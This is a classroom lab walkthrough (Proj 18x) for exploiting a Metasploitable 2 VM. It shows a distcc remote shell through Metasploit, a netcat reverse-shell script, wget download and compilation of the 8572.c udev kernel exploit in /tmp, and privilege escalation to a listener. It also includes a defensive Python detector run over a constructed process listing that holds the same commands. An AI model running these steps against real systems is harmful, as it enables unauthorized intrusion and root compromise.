On Kali, in a Terminal, execute this command.
sparta
In the Sparta window, click "Click here to add host(s) to scope". In the "Add hosts(s) to scope" box, enter your Metasploitable 2 IP address, as shown below.
Click the "Add to scope" button.
Within a few seconds, Sparta finds the more obvious services, but it keeps scanning.
A box will pop up attempting to show a screenshot. Close it.
After about 2 minutes, it will find "distcc", as shown below.
DistCC is used to distribute large compile jobs across several systems, but the daemon can be abused to execute arbitrary commands.
Close Sparta.
msfconsole
In Metasploit, execute this command.
search distcc
In Metasploit, execute this command.
info exploit/unix/misc/distcc_exec
As shown below, this exploit only requires RHOST.
In Metasploit, execute these commands, using the IP of your Metasploitable 2 target.
use exploit/unix/misc/distcc_exec
set RHOST 172.16.1.190
exploit
whoami
You get a shell, running as "daemon", as shown below.
Save a FULL DESKTOP image with the filename Proj 18xa from Your Name.
In Metasploit, in the command shell, execute these commands.
uname -a
lsb_release -a
The target has kernel 2.6.24 and is running Ubuntu 8.04, as shown below.
searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6
We'll use the 8572.c exploit, highlighted in the image below.
On Kali, execute this command, to examine the exploit source code.
less /usr/share/exploitdb/platforms/linux/local/8572.c
Information about the exploit appears, as shown below.
Read it and then press Q to exit "less".
On Kali, execute these commands to make the exploit source available over HTTP.
service apache2 restart
ln -s /usr/share/exploitdb/platforms/linux/local/ /var/www/html/
We'll use a simple netcat reverse shell.
On Kali, execute this command.
nano /var/www/html/run
In nano, enter these lines, replacing the IP address with the address of your Kali machine.
#!/bin/bash
nc 172.16.1.188 12345 -e /bin/bash
Press Ctrl+C, Y, Enter to save the file.
In the Metasploit command shell on the target, execute these commands to download the reverse shell script and the exploit source, and compile the exploit.
cd /tmp
wget http://172.16.1.188/run
wget http://172.16.1.188/local/8572.c
gcc -o exploit 8572.c
ls -l
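The two steps above (the netcat reverse shell script and the download-and-compile sequence in /tmp) leave a recognisable footprint in a process listing. The following added example, which is not part of the original lab, shows the detection a defender would run over a periodic "ps aux" snapshot: it flags a netcat invocation with -e or -c, a compiler or downloader launched by a service account, and a binary executed from a scratch directory. The sample listing is constructed for this example and mirrors the lab's commands; the service-account list and rule names are assumptions to tune per host.

```python
"""Flag process-listing lines that match the post-exploitation pattern
described in this lab: a netcat reverse shell, a compiler or downloader
run by a service account, and a binary executed from /tmp."""
import os
import re
from dataclasses import dataclass

# Accounts that normally never compile or download anything.
# Constructed list for this example; tune it to the host being monitored.
SERVICE_ACCOUNTS = {"daemon", "www-data", "nobody", "distccd", "postgres", "mysql"}
COMPILERS = {"gcc", "cc", "g++", "make"}
DOWNLOADERS = {"wget", "curl", "tftp", "ftp"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed "ps aux" snapshot (not captured from a real host) that
# mirrors the steps in the walkthrough: udevd, a daemon-user reverse shell,
# wget and gcc run as daemon, and the compiled exploit started from /tmp.
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   2844  1692 ?        Ss   10:01   0:01 /sbin/init
root      2739  0.0  0.0   2216   884 ?        S<s  10:01   0:00 /sbin/udevd --daemon
www-data  1420  0.0  0.5  20480  6100 ?        S    10:02   0:00 /usr/sbin/apache2 -k start
daemon    4098  0.0  0.1   3420  1200 ?        S    10:33   0:00 wget http://172.16.1.188/run
daemon    4102  0.0  0.2   5124  2044 ?        S    10:33   0:00 sh -c nc 172.16.1.188 12345 -e /bin/bash
daemon    4110  0.1  0.4   8012  3100 ?        S    10:34   0:00 gcc -o exploit 8572.c
daemon    4120  0.0  0.0   1900   560 ?        S    10:35   0:00 /tmp/exploit 2738
"""


@dataclass(frozen=True)
class Finding:
    pid: int
    user: str
    rule: str
    command: str


def parse_ps(text):
    """Parse 'ps aux' output into (user, pid, command) tuples, skipping the header."""
    rows = []
    for line in text.splitlines():
        # USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND -> 11 fields,
        # the command keeps its internal spaces because of maxsplit=10.
        parts = line.split(None, 10)
        if len(parts) < 11 or not parts[1].isdigit():
            continue  # header or malformed line
        rows.append((parts[0], int(parts[1]), parts[10]))
    return rows


def classify(user, command):
    """Return the names of all rules a single command line triggers."""
    rules = []
    tokens = command.split()
    if not tokens:
        return rules
    # Rule 1: netcat given -e/-c hands the socket a shell (a plain listener is not flagged).
    m = re.search(r"\b(nc|ncat|netcat)\b(.*)$", command)
    if m and re.search(r"(^|\s)-(e|c)(\s|$)", m.group(2)):
        rules.append("reverse_shell")
    prog = os.path.basename(tokens[0])
    # Rule 2/3: service accounts such as "daemon" have no business compiling or fetching files.
    if user in SERVICE_ACCOUNTS and prog in COMPILERS:
        rules.append("compiler_by_service_account")
    if user in SERVICE_ACCOUNTS and prog in DOWNLOADERS:
        rules.append("downloader_by_service_account")
    # Rule 4: executables launched from world-writable scratch directories.
    if command.startswith(SCRATCH_DIRS):
        rules.append("exec_from_scratch_dir")
    return rules


def scan_ps_output(text):
    """Run every rule over every process and return the findings sorted by PID."""
    return sorted(
        (Finding(pid, user, rule, cmd)
         for user, pid, cmd in parse_ps(text)
         for rule in classify(user, cmd)),
        key=lambda f: (f.pid, f.rule),
    )


if __name__ == "__main__":
    for f in scan_ps_output(SAMPLE_PS):
        print(f"PID {f.pid:>5} user={f.user:<8} {f.rule:<30} {f.command}")
```

Each rule on its own is noisy on a build host, but the combination seen here (download, compile and execute from /tmp by the distcc service account within minutes) is exactly the sequence the lab walks through, so a real deployment would correlate findings per user and time window rather than alert on single lines.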
On Kali, in your low-privilege shell, execute these commands to list the netlink sockets and find the udev process.
cat /proc/net/netlink
ps aux | grep udev
The only nonzero PID in netlink should
be the number you want. When I did it,
it was 2738, as shown below.
For confirmation, the PID of the udevd process should be one higher. It was 2739 when I did it, as shown below.
On Kali, open a new Terminal window and execute this command to listen for connections.
nc -lvp 12345
In your low-privilege shell on the target, execute this command, using the netlink PID you found.
./exploit 2738
Save a FULL DESKTOP image with the filename Proj 18xb from Your Name.